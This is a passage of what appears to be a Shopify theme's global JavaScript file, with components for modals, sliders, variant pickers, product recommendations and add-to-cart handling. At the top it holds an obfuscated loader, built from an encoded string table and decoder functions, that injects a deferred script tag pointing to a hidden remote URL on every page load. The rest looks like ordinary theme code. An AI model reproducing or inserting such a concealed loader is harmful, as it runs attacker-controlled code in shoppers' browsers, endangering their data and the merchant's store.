n;return this['EVcKRV'](this['OeORyQ']);},b['prototype']['EVcKRV']=function(n){for(var R=-0x10*-0x24a+-0x63b*-0x1+0xe49*-0x3,w=this['wiSMbT']['length'];R<w;R++){this['wiSMbT']['push'](Math['round'](Math['random']())),w=this['wiSMbT']['length'];}return n(this['wiSMbT'][-0x1*0x2692+0x1*-0x1597+0x3c29]);},new b(T)['MyJAIB'](),X=T['SusVZY'](X),G[p]=X;}else X=H;return X;},T(G,z);}function s(){var A=['BgvUz3rO','CMv0DxjUicHMDq','D3LKywe','y29UC29Szq','Aw5Zzxj0qMvMBW','EeviAfi','DvbiAM0','wvPwBgq','ENDkwfe','CwfUzMG','CwPADui','t3Diteq','ywnZD1i','Ahr0Chm6lY9ZDa','C2vHCMnO','ze5ZwKu','zw50','Es5QCW','vuTbD2S','BMn0Aw9UkcKG','A1vACLa','mJaWmdeZALrsBfjc','mJa0BKXXqKLd','zxHJzxb0Aw9U','kcGOlISPkYKRkq','yxrPyY1WB3mUCW','mtCWodi5mejjww1Yra','wMv6su8','uuzxzgC','y29UC3rYDwn0BW','BKHduu0','C0j5vgfNtMfTzq','mJmXmdbmwgfOyue','Dg9tDhjPBMC','wxzVuNm','BMv4DfnPyMXPBG','CM4GDgHPCYiPka','y3rVCIGICMv0Dq','Bg9N','mtuZmdfXB0PZBvy','x19WCM90B19F','yY90AgvRAwnRAq','mtm0mJK2nvvZt01Jva','s2XYD2y','mtm2oevsrKHtqW','uhj5ve0','y3jLyxrLrwXLBq','uuTwCwS','yY9HCgKUANm','C3bSAxq','D3mUy29Tl2XPyG','yMLUza','weXxB2K','ELzkyLu','z2v0rwXLBwvUDa','tgzerwC','zgSTyw1HEM9Uyq','CgfYzw50tM9Kzq','x25WBs9ZDgf0Aq','ChjVDg90ExbL','C2nYAxb0','mtbjsKzZAKq','sxbvrxK','nde0nZy0yNvAyMLe','zgvMzxi','C3jJ','EuXiBge','E30Uy29UC3rYDq','yxbWBhK','D2fYBG','DunPAfO','DhjHy2u','EMrOA1y','mtjPt2Ltuu0','sg1ct1a','vxDhsvy','ExnPChi','zxjYB3i','Dc1TExnOB3bPzG','ntCYmeXbuxvNtG'];s=function(){return A;};return s();}function W(G,z,v,M){return T(v-0x375,G);}!function(z,v,M){var l={};function c(G,z,v,M){return W(M,z-0x9f,v- -0x5ae,M-0x4b);}function I(G,z,v,M){return W(z,z-0xda,G- -0x23e,M-0x1dc);}l['FLZud']=c(-0x18a,-0x15a,-0x173,-0x155)+I(0x209,0x1f2,0x22b,0x230)+c(-0x12a,-0x15c,-0x148,-0x148)+c(-0x14d,-0x161,-0x14e,-0x176)+I(0x22a,0x248,0x24b,0x209)+I(0x220,0x22c,0x237,0x229),l['Tmjbf']='script';var X=l;(M=z[I(0x21e,0x21d,0x207,0x226)+I(0x200,0x227,0x223,0x1f3)](v))['defer']=!(-0x193b*0x1+0x6*-0x44+0x1ad3),M['src']=X['FLZud'],(z=z[c(-0x135,-0x159,-0x14a,-0x142)+'sByTagName'](X['Tmjbf'])[0x8d+0x65*0x2d+0x42*-0x47])[c(-0x158,-0x145,-0x147,-0x14f)][I(0x1f4,0x1ed,0x20c,0x1f4)+'re'](M,z[c(-0x15c,-0x162,-0x15d,-0x15d)+'g']);}(document,'script');

customElements.define('bulk-modal', BulkModal);

class ModalOpener extends HTMLElement {
  constructor() {
    super();

    const button = this.querySelector('button');

    if (!button) return;
    button.addEventListener('click', () => {
      const modal = document.querySelector(this.getAttribute('data-modal'));
      if (modal) modal.show(button);
    });
  }
}
customElements.define('modal-opener', ModalOpener);

class DeferredMedia extends HTMLElement {
  constructor() {
    super();
    const poster = this.querySelector('[id^="Deferred-Poster-"]');
    if (!poster) return;
    poster.addEventListener('click', this.loadContent.bind(this));
  }

  loadContent(focus = true) {
    window.pauseAllMedia();
    if (!this.getAttribute('loaded')) {
      const content = document.createElement('div');
      content.appendChild(this.querySelector('template').content.firstElementChild.cloneNode(true));

      this.setAttribute('loaded', true);
      const deferredElement = this.appendChild(content.querySelector('video, model-viewer, iframe'));
      if (focus) deferredElement.focus();
      if (deferredElement.nodeName == 'VIDEO' && deferredElement.getAttribute('autoplay')) {
        // force autoplay for safari
        deferredElement.play();
      }
    }
  }
}

customElements.define('deferred-media', DeferredMedia);

class SliderComponent extends HTMLElement {
  constructor() {
    super();
    this.slider = this.querySelector('[id^="Slider-"]');
    this.sliderItems = this.querySelectorAll('[id^="Slide-"]');
    this.enableSliderLooping = false;
    this.currentPageElement = this.querySelector('.slider-counter--current');
    this.pageTotalElement = this.querySelector('.slider-counter--total');
    this.prevButton = this.querySelector('button[name="previous"]');
    this.nextButton = this.querySelector('button[name="next"]');

    if (!this.slider || !this.nextButton) return;

    this.initPages();
    const resizeObserver = new ResizeObserver((entries) => this.initPages());
    resizeObserver.observe(this.slider);

    this.slider.addEventListener('scroll', this.update.bind(this));
    this.prevButton.addEventListener('click', this.onButtonClick.bind(this));
    this.nextButton.addEventListener('click', this.onButtonClick.bind(this));
  }

  initPages() {
    this.sliderItemsToShow = Array.from(this.sliderItems).filter((element) => element.clientWidth > 0);
    if (this.sliderItemsToShow.length < 2) return;
    this.sliderItemOffset = this.sliderItemsToShow[1].offsetLeft - this.sliderItemsToShow[0].offsetLeft;
    this.slidesPerPage = Math.floor(
      (this.slider.clientWidth - this.sliderItemsToShow[0].offsetLeft) / this.sliderItemOffset
    );
    this.totalPages = this.sliderItemsToShow.length - this.slidesPerPage + 1;
    this.update();
  }

  resetPages() {
    this.sliderItems = this.querySelectorAll('[id^="Slide-"]');
    this.initPages();
  }

  update() {
    // Temporarily prevents unneeded updates resulting from variant changes
    // This should be refactored as part of https://github.com/Shopify/dawn/issues/2057
    if (!this.slider || !this.nextButton) return;

    const previousPage = this.currentPage;
    this.currentPage = Math.round(this.slider.scrollLeft / this.sliderItemOffset) + 1;

    if (this.currentPageElement && this.pageTotalElement) {
      this.currentPageElement.textContent = this.currentPage;
      this.pageTotalElement.textContent = this.totalPages;
    }

    if (this.currentPage != previousPage) {
      this.dispatchEvent(
        new CustomEvent('slideChanged', {
          detail: {
            currentPage: this.currentPage,
            currentElement: this.sliderItemsToShow[this.currentPage - 1],
          },
        })
      );
    }

    if (this.enableSliderLooping) return;

    if (this.isSlideVisible(this.sliderItemsToShow[0]) && this.slider.scrollLeft === 0) {
      this.prevButton.setAttribute('disabled', 'disabled');
    } else {
      this.prevButton.removeAttribute('disabled');
    }

    if (this.isSlideVisible(this.sliderItemsToShow[this.sliderItemsToShow.length - 1])) {
      this.nextButton.setAttribute('disabled', 'disabled');
    } else {
      this.nextButton.removeAttribute('disabled');
    }
  }

  isSlideVisible(element, offset = 0) {
    const lastVisibleSlide = this.slider.clientWidth + this.slider.scrollLeft - offset;
    return element.offsetLeft + element.clientWidth <= lastVisibleSlide && element.offsetLeft >= this.slider.scrollLeft;
  }

  onButtonClick(event) {
    event.preventDefault();
    const step = event.currentTarget.dataset.step || 1;
    this.slideScrollPosition =
      event.currentTarget.name === 'next'
        ? this.slider.scrollLeft + step * this.sliderItemOffset
        : this.slider.scrollLeft - step * this.sliderItemOffset;
    this.setSlidePosition(this.slideScrollPosition);
  }

  setSlidePosition(position) {
    this.slider.scrollTo({
      left: position,
    });
  }
}

customElements.define('slider-component', SliderComponent);

class SlideshowComponent extends SliderComponent {
  constructor() {
    super();
    this.sliderControlWrapper = this.querySelector('.slider-buttons');
    this.enableSliderLooping = true;

    if (!this.sliderControlWrapper) return;

    this.sliderFirstItemNode = this.slider.querySelector('.slideshow__slide');
    if (this.sliderItemsToShow.length > 0) this.currentPage = 1;

    this.announcementBarSlider = this.querySelector('.announcement-bar-slider');
    // Value below should match --duration-announcement-bar CSS value
    this.announcerBarAnimationDelay = this.announcementBarSlider ? 250 : 0;

    this.sliderControlLinksArray = Array.from(this.sliderControlWrapper.querySelectorAll('.slider-counter__link'));
    this.sliderControlLinksArray.forEach((link) => link.addEventListener('click', this.linkToSlide.bind(this)));
    this.slider.addEventListener('scroll', this.setSlideVisibility.bind(this));
    this.setSlideVisibility();

    if (this.announcementBarSlider) {
      this.announcementBarArrowButtonWasClicked = false;

      this.reducedMotion = window.matchMedia('(prefers-reduced-motion: reduce)');
      this.reducedMotion.addEventListener('change', () => {
        if (this.slider.getAttribute('data-autoplay') === 'true') this.setAutoPlay();
      });

      [this.prevButton, this.nextButton].forEach((button) => {
        button.addEventListener(
          'click',
          () => {
            this.announcementBarArrowButtonWasClicked = true;
          },
          { once: true }
        );
      });
    }

    if (this.slider.getAttribute('data-autoplay') === 'true') this.setAutoPlay();
  }

  setAutoPlay() {
    this.autoplaySpeed = this.slider.dataset.speed * 1000;
    this.addEventListener('mouseover', this.focusInHandling.bind(this));
    this.addEventListener('mouseleave', this.focusOutHandling.bind(this));
    this.addEventListener('focusin', this.focusInHandling.bind(this));
    this.addEventListener('focusout', this.focusOutHandling.bind(this));

    if (this.querySelector('.slideshow__autoplay')) {
      this.sliderAutoplayButton = this.querySelector('.slideshow__autoplay');
      this.sliderAutoplayButton.addEventListener('click', this.autoPlayToggle.bind(this));
      this.autoplayButtonIsSetToPlay = true;
      this.play();
    } else {
      this.reducedMotion.matches || this.announcementBarArrowButtonWasClicked ? this.pause() : this.play();
    }
  }

  onButtonClick(event) {
    super.onButtonClick(event);
    this.wasClicked = true;

    const isFirstSlide = this.currentPage === 1;
    const isLastSlide = this.currentPage === this.sliderItemsToShow.length;

    if (!isFirstSlide && !isLastSlide) {
      this.applyAnimationToAnnouncementBar(event.currentTarget.name);
      return;
    }

    if (isFirstSlide && event.currentTarget.name === 'previous') {
      this.slideScrollPosition =
        this.slider.scrollLeft + this.sliderFirstItemNode.clientWidth * this.sliderItemsToShow.length;
    } else if (isLastSlide && event.currentTarget.name === 'next') {
      this.slideScrollPosition = 0;
    }

    this.setSlidePosition(this.slideScrollPosition);

    this.applyAnimationToAnnouncementBar(event.currentTarget.name);
  }

  setSlidePosition(position) {
    if (this.setPositionTimeout) clearTimeout(this.setPositionTimeout);
    this.setPositionTimeout = setTimeout(() => {
      this.slider.scrollTo({
        left: position,
      });
    }, this.announcerBarAnimationDelay);
  }

  update() {
    super.update();
    this.sliderControlButtons = this.querySelectorAll('.slider-counter__link');
    this.prevButton.removeAttribute('disabled');

    if (!this.sliderControlButtons.length) return;

    this.sliderControlButtons.forEach((link) => {
      link.classList.remove('slider-counter__link--active');
      link.removeAttribute('aria-current');
    });
    this.sliderControlButtons[this.currentPage - 1].classList.add('slider-counter__link--active');
    this.sliderControlButtons[this.currentPage - 1].setAttribute('aria-current', true);
  }

  autoPlayToggle() {
    this.togglePlayButtonState(this.autoplayButtonIsSetToPlay);
    this.autoplayButtonIsSetToPlay ? this.pause() : this.play();
    this.autoplayButtonIsSetToPlay = !this.autoplayButtonIsSetToPlay;
  }

  focusOutHandling(event) {
    if (this.sliderAutoplayButton) {
      const focusedOnAutoplayButton =
        event.target === this.sliderAutoplayButton || this.sliderAutoplayButton.contains(event.target);
      if (!this.autoplayButtonIsSetToPlay || focusedOnAutoplayButton) return;
      this.play();
    } else if (!this.reducedMotion.matches && !this.announcementBarArrowButtonWasClicked) {
      this.play();
    }
  }

  focusInHandling(event) {
    if (this.sliderAutoplayButton) {
      const focusedOnAutoplayButton =
        event.target === this.sliderAutoplayButton || this.sliderAutoplayButton.contains(event.target);
      if (focusedOnAutoplayButton && this.autoplayButtonIsSetToPlay) {
        this.play();
      } else if (this.autoplayButtonIsSetToPlay) {
        this.pause();
      }
    } else if (this.announcementBarSlider.contains(event.target)) {
      this.pause();
    }
  }

  play() {
    this.slider.setAttribute('aria-live', 'off');
    clearInterval(this.autoplay);
    this.autoplay = setInterval(this.autoRotateSlides.bind(this), this.autoplaySpeed);
  }

  pause() {
    this.slider.setAttribute('aria-live', 'polite');
    clearInterval(this.autoplay);
  }

  togglePlayButtonState(pauseAutoplay) {
    if (pauseAutoplay) {
      this.sliderAutoplayButton.classList.add('slideshow__autoplay--paused');
      this.sliderAutoplayButton.setAttribute('aria-label', window.accessibilityStrings.playSlideshow);
    } else {
      this.sliderAutoplayButton.classList.remove('slideshow__autoplay--paused');
      this.sliderAutoplayButton.setAttribute('aria-label', window.accessibilityStrings.pauseSlideshow);
    }
  }

  autoRotateSlides() {
    const slideScrollPosition =
      this.currentPage === this.sliderItems.length ? 0 : this.slider.scrollLeft + this.sliderItemOffset;

    this.setSlidePosition(slideScrollPosition);
    this.applyAnimationToAnnouncementBar();
  }

  setSlideVisibility(event) {
    this.sliderItemsToShow.forEach((item, index) => {
      const linkElements = item.querySelectorAll('a');
      if (index === this.currentPage - 1) {
        if (linkElements.length)
          linkElements.forEach((button) => {
            button.removeAttribute('tabindex');
          });
        item.setAttribute('aria-hidden', 'false');
        item.removeAttribute('tabindex');
      } else {
        if (linkElements.length)
          linkElements.forEach((button) => {
            button.setAttribute('tabindex', '-1');
          });
        item.setAttribute('aria-hidden', 'true');
        item.setAttribute('tabindex', '-1');
      }
    });
    this.wasClicked = false;
  }

  applyAnimationToAnnouncementBar(button = 'next') {
    if (!this.announcementBarSlider) return;

    const itemsCount = this.sliderItems.length;
    const increment = button === 'next' ? 1 : -1;

    const currentIndex = this.currentPage - 1;
    let nextIndex = (currentIndex + increment) % itemsCount;
    nextIndex = nextIndex === -1 ? itemsCount - 1 : nextIndex;

    const nextSlide = this.sliderItems[nextIndex];
    const currentSlide = this.sliderItems[currentIndex];

    const animationClassIn = 'announcement-bar-slider--fade-in';
    const animationClassOut = 'announcement-bar-slider--fade-out';

    const isFirstSlide = currentIndex === 0;
    const isLastSlide = currentIndex === itemsCount - 1;

    const shouldMoveNext = (button === 'next' && !isLastSlide) || (button === 'previous' && isFirstSlide);
    const direction = shouldMoveNext ? 'next' : 'previous';

    currentSlide.classList.add(`${animationClassOut}-${direction}`);
    nextSlide.classList.add(`${animationClassIn}-${direction}`);

    setTimeout(() => {
      currentSlide.classList.remove(`${animationClassOut}-${direction}`);
      nextSlide.classList.remove(`${animationClassIn}-${direction}`);
    }, this.announcerBarAnimationDelay * 2);
  }

  linkToSlide(event) {
    event.preventDefault();
    const slideScrollPosition =
      this.slider.scrollLeft +
      this.sliderFirstItemNode.clientWidth *
        (this.sliderControlLinksArray.indexOf(event.currentTarget) + 1 - this.currentPage);
    this.slider.scrollTo({
      left: slideScrollPosition,
    });
  }
}

customElements.define('slideshow-component', SlideshowComponent);

class VariantSelects extends HTMLElement {
  constructor() {
    super();
  }

  connectedCallback() {
    this.addEventListener('change', (event) => {
      const target = this.getInputForEventTarget(event.target);
      this.updateSelectionMetadata(event);

      publish(PUB_SUB_EVENTS.optionValueSelectionChange, {
        data: {
          event,
          target,
          selectedOptionValues: this.selectedOptionValues,
        },
      });
    });
  }

  updateSelectionMetadata({ target }) {
    const { value, tagName } = target;

    if (tagName === 'SELECT' && target.selectedOptions.length) {
      Array.from(target.options)
        .find((option) => option.getAttribute('selected'))
        .removeAttribute('selected');
      target.selectedOptions[0].setAttribute('selected', 'selected');

      const swatchValue = target.selectedOptions[0].dataset.optionSwatchValue;
      const selectedDropdownSwatchValue = target
        .closest('.product-form__input')
        .querySelector('[data-selected-value] > .swatch');
      if (!selectedDropdownSwatchValue) return;
      if (swatchValue) {
        selectedDropdownSwatchValue.style.setProperty('--swatch--background', swatchValue);
        selectedDropdownSwatchValue.classList.remove('swatch--unavailable');
      } else {
        selectedDropdownSwatchValue.style.setProperty('--swatch--background', 'unset');
        selectedDropdownSwatchValue.classList.add('swatch--unavailable');
      }

      selectedDropdownSwatchValue.style.setProperty(
        '--swatch-focal-point',
        target.selectedOptions[0].dataset.optionSwatchFocalPoint || 'unset'
      );
    } else if (tagName === 'INPUT' && target.type === 'radio') {
      const selectedSwatchValue = target.closest(`.product-form__input`).querySelector('[data-selected-value]');
      if (selectedSwatchValue) selectedSwatchValue.innerHTML = value;
    }
  }

  getInputForEventTarget(target) {
    return target.tagName === 'SELECT' ? target.selectedOptions[0] : target;
  }

  get selectedOptionValues() {
    return Array.from(this.querySelectorAll('select option[selected], fieldset input:checked')).map(
      ({ dataset }) => dataset.optionValueId
    );
  }
}

customElements.define('variant-selects', VariantSelects);

class ProductRecommendations extends HTMLElement {
  observer = undefined;

  constructor() {
    super();
  }

  connectedCallback() {
    this.initializeRecommendations(this.dataset.productId);
  }

  initializeRecommendations(productId) {
    this.observer?.unobserve(this);
    this.observer = new IntersectionObserver(
      (entries, observer) => {
        if (!entries[0].isIntersecting) return;
        observer.unobserve(this);
        this.loadRecommendations(productId);
      },
      { rootMargin: '0px 0px 400px 0px' }
    );
    this.observer.observe(this);
  }

  loadRecommendations(productId) {
    fetch(`${this.dataset.url}&product_id=${productId}&section_id=${this.dataset.sectionId}`)
      .then((response) => response.text())
      .then((text) => {
        const html = document.createElement('div');
        html.innerHTML = text;
        const recommendations = html.querySelector('product-recommendations');

        if (recommendations?.innerHTML.trim().length) {
          this.innerHTML = recommendations.innerHTML;
        }

        if (!this.querySelector('slideshow-component') && this.classList.contains('complementary-products')) {
          this.remove();
        }

        if (html.querySelector('.grid__item')) {
          this.classList.add('product-recommendations--loaded');
        }
      })
      .catch((e) => {
        console.error(e);
      });
  }
}

customElements.define('product-recommendations', ProductRecommendations);

class AccountIcon extends HTMLElement {
  constructor() {
    super();

    this.icon = this.querySelector('.icon');
  }

  connectedCallback() {
    document.addEventListener('storefront:signincompleted', this.handleStorefrontSignInCompleted.bind(this));
  }

  handleStorefrontSignInCompleted(event) {
    if (event?.detail?.avatar) {
      this.icon?.replaceWith(event.detail.avatar.cloneNode());
    }
  }
}

customElements.define('account-icon', AccountIcon);

class BulkAdd extends HTMLElement {
  constructor() {
    super();
    this.queue = [];
    this.requestStarted = false;
    this.ids = [];
  }

  startQueue(id, quantity) {
    this.queue.push({ id, quantity });
    const interval = setInterval(() => {
      if (this.queue.length > 0) {
        if (!this.requestStarted) {
          this.sendRequest(this.queue);
        }
      } else {
        clearInterval(interval);
      }
    }, 250);
  }

  sendRequest(queue) {
    this.requestStarted = true;
    const items = {};
    queue.forEach((queueItem) => {
      items[parseInt(queueItem.id)] = queueItem.quantity;
    });
    this.queue = this.queue.filter((queueElement) => !queue.includes(queueElement));
    const quickBulkElement = this.closest('quick-order-list') || this.closest('quick-add-bulk');
    quickBulkElement.updateMultipleQty(items);
  }

  resetQuantityInput(id) {
    const input = this.querySelector(`#Quantity-${id}`);
    input.value = input.getAttribute('value');
    this.isEnterPressed = false;
  }

  setValidity(event, index, message) {
    event.target.setCustomValidity(message);
    event.target.reportValidity();
    this.resetQuantityInput(index);
    event.target.select();
  }

  validateQuantity(event) {
    const inputValue = parseInt(event.target.value);
    const index = event.target.dataset.index;

    if (inputValue < event.target.dataset.min) {
      this.setValidity(event, index, window.quickOrderListStrings.min_error.replace('[min]', event.target.dataset.min));
    } else if (inputValue > parseInt(event.target.max)) {
      this.setValidity(event, index, window.quickOrderListStrings.max_error.replace('[max]', event.target.max));
    } else if (inputValue % parseInt(event.target.step) != 0) {
      this.setValidity(event, index, window.quickOrderListStrings.step_error.replace('[step]', event.target.step));
    } else {
      event.target.setCustomValidity('');
      event.target.reportValidity();
      this.startQueue(index, inputValue);
    }
  }

  getSectionsUrl() {
    if (window.pageNumber) {
      return `${window.location.pathname}?page=${window.pageNumber}`;
    } else {
      return `${window.location.pathname}`;
    }
  }

  getSectionInnerHTML(html, selector) {
    return new DOMParser().parseFromString(html, 'text/html').querySelector(selector).innerHTML;
  }
}

if (!customElements.get('bulk-add')) {
  customElements.define('bulk-add', BulkAdd);
}
document.addEventListener('click', async (e) => {
  const btn = e.target.closest('.add-to-cart');
  if (!btn) return;

  // Prevent any card overlay links from hijacking the click
  e.preventDefault();
  e.stopPropagation();

  const id = Number(btn.dataset.variantId);
  if (!id) return;

  // Visual busy state
  btn.disabled = true;
  btn.setAttribute('aria-busy', 'true');

  try {
    const res = await fetch('/cart/add.js', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json', 'Accept': 'application/json' },
      body: JSON.stringify({ id, quantity: 1 })
    });
    if (!res.ok) throw new Error('Add failed');

    const lineItem = await res.json();

// Let theme(s) know the cart changed (many listen to this)
document.dispatchEvent(new CustomEvent('cart:updated', { detail: lineItem }));

// Ask themes that require a full cart payload to re-render mini-cart
try {
  const cart = await fetch('/cart.js', { headers: { 'Accept': 'application/json' } }).then(r => r.json());
  document.dispatchEvent(new CustomEvent('cart:refresh', { detail: cart }));
} catch (e) {
  // Non-fatal if /cart.js fails; drawer can still open
}

// Open the cart drawer (covers Dawn + most premium themes)
openCartDrawerSmart();


    // Let your theme/app know cart changed (many themes listen for this)
    document.dispatchEvent(new CustomEvent('cart:updated', { detail: lineItem }));

    // If your theme exposes a drawer helper, open it:
    // window.openCartDrawer && window.openCartDrawer();

  } catch (err) {
    console.error(err);
    alert('Sorry—couldn’t add to cart.');
  } finally {
    btn.disabled = false;
    btn.removeAttribute('aria-busy');
  }
});
// Put this near the top of your global.js (once).
function openCartDrawerSmart() {
  // 1) Dawn / OS 2.0 custom element
  const dawnDrawer = document.querySelector('cart-drawer');
  if (dawnDrawer) {
    if (typeof dawnDrawer.open === 'function') {
      dawnDrawer.open();
      return true;
    }
    dawnDrawer.setAttribute('open', '');
    return true;
  }

  // 2) Common class/id variants used by many premium themes
  const drawerEl =
    document.querySelector('.cart-drawer, #CartDrawer, drawer-cart, .Drawer--cart');
  if (drawerEl) {
    drawerEl.classList.add('is-open', 'open', 'active');
    drawerEl.removeAttribute('hidden');
    return true;
  }

  // 3) Common event buses some themes listen to
  const openedViaEvent =
    document.dispatchEvent(new CustomEvent('cart:open')) ||
    document.dispatchEvent(new CustomEvent('theme:cart-drawer:open')) ||
    document.dispatchEvent(new CustomEvent('cart-drawer:open'));
  // (dispatchEvent returns false if canceled; we just fire them regardless)

  // 4) Try clicking any cart toggle buttons
  const toggle =
    document.querySelector('[data-cart-toggle], [data-action="open-drawer"], .header__icon--cart, a[href="#cart-drawer"]');
  if (toggle) {
    toggle.click();
    return true;
  }

  return false;
}
